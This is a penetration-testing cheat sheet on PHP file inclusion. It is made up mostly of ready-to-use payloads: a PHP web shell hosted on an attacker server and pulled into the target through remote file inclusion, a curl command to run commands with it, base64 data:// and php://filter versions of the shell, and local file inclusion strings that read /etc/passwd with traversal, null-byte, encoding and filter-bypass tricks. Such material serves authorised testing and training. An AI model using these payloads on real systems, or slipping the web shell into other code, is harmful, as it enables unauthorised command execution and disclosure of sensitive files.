File Inclusion

Remote File Inclusion (RFI)

If we find a way to include a remote file, we could try to include php code to execute commands on the host

http://<target>/index.php?page=http://<attacker>/shell.txt

We could serve a malicious PHP code so that the host interprets it.

echo '<?php system($_GET["cmd"]);?>' > shell.txt
python3 -m http.server 80
curl 'http://<target>/index.php?page=http://<attacker>/shell.txt&cmd=<comand>'

If the server were blocking access to external resources, we could try using the data:// wrapper to inject PHP code as base64.

data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWyJjbWQiXSk7Pz4K

php://filter/convert.base64-decode/resource=data://plain/text,PD9waHAgc3lzdGVtKCRfR0VUWyJjbWQiXSk7Pz4K

Local File Inclusion (LFI)

Absolute Path

http://<target>/index.php?page=/etc/passwd

Relative Path Traversal

http://<target>/index.php?page=../../../etc/passwd

Null Byte

http://<target>/index.php?page=../../../etc/passwd%00

Encoding

http://<target>/index.php?page=%252e%252e%252fetc%252fpasswd
http://<target>/index.php?page=%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd

Truncation

http://<target>/index.php?page=../../../etc/passwd......[ADD MORE]
http://<target>/index.php?page=../../../[ADD MORE]../../../etc/passwd

Filtered characters

http://<target>/index.php?page=....//....//....//etc/passwd

References

https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/File%20Inclusion https://book.hacktricks.xyz/pentesting-web/file-inclusion